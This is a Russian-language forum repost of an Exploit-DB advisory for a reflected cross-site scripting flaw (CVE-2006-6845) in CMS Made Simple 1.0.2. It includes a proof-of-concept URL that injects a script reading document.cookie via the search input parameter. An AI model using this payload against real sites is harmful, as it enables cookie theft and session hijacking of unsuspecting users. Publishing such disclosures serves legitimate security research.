Exploit CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
29272
Проверка EDB
  1. Пройдено
Автор
NICOKILLER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6845
Дата публикации
2006-12-11
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting
Код:
source: https://www.securityfocus.com/bid/21527/info

CMS Made Simple is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/index.php?mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=51&cntnt01searchinput=Enter+Search..."><script>alert(document.cookie)</script>&cntnt01submit=Submit
 
Источник
www.exploit-db.com

Похожие темы